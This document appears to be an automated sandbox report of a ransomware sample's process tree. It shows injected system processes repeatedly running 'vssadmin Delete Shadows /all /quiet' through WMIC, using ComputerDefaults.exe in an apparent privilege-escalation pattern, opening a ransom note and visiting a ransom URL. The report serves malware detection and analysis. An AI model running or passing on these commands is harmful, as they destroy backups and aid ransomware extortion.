PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139
PID 4884 wrote to memory of 5348	4884	msedge.exe	139

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:2700
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3192
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4396
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3796
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5096
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2720
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:280
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4936
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4496
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3500
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2380

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2868
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2984
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4836
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5340
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3500
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2428

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
PID:3508
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\02ba3fa9b8eab79fce998cc95068d0850d9f7a649e68885f5b898dfd9a15f86a.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4396
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5852
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:2004
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5708
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4976
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5580
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5880
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5300
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2168
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4932
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3684
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5044
- C:\Windows\system32\cmd.exe
  cmd /c "start http://3cfcfa5820acfc40c4yxxumuibd.veryits.quest/yxxumuibd^&2^&46383801^&72^&309^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://3cfcfa5820acfc40c4yxxumuibd.veryits.quest/yxxumuibd&2&46383801&72&309&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff95fc446f8,0x7ff95fc44708,0x7ff95fc44718
      4⤵
      PID:4640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
      4⤵
      PID:5348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
      4⤵
      PID:5376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
      4⤵
      PID:5664
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
      4⤵
      PID:5672
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1
      4⤵
      PID:5880
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
      4⤵
      PID:5156
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
      4⤵
      PID:2428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
      4⤵
      PID:5480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
      4⤵
      PID:5244
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
      4⤵
      PID:5132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
      4⤵
      PID:4196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2024 /prefetch:1
      4⤵
      PID:5852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2248 /prefetch:1
      4⤵
      PID:2480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,6473939226351075200,10093654977367678686,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5444 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1604
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4932
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3660
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3192
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2788

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:3864
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4088
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5764
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:284
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5500

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
PID:3960
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5276
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3484
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:32

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:4024
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2512
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1864
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4268
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3132

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1036

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3544
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3264
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5992
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1928
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2156
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2668

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:440
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:6040
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5780
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:728
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5628
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2532

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
PID:4848
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4328
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4060

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Modifies registry class
PID:1172

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3976

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4572

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:464
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4428
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5460

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4452
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:316
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5336

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4012
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5500

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4628

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5756

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5904

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5988

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2044
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3192

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:268

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:276

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5136

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:116
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4868
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5816

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2480
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4836
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:728

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5704
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5336

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3144

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5128

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:6116
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:272
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:844

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2204
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6136
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5580

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4476

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4496
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3484

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5300

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4932
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5672
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5816
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6040

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4356
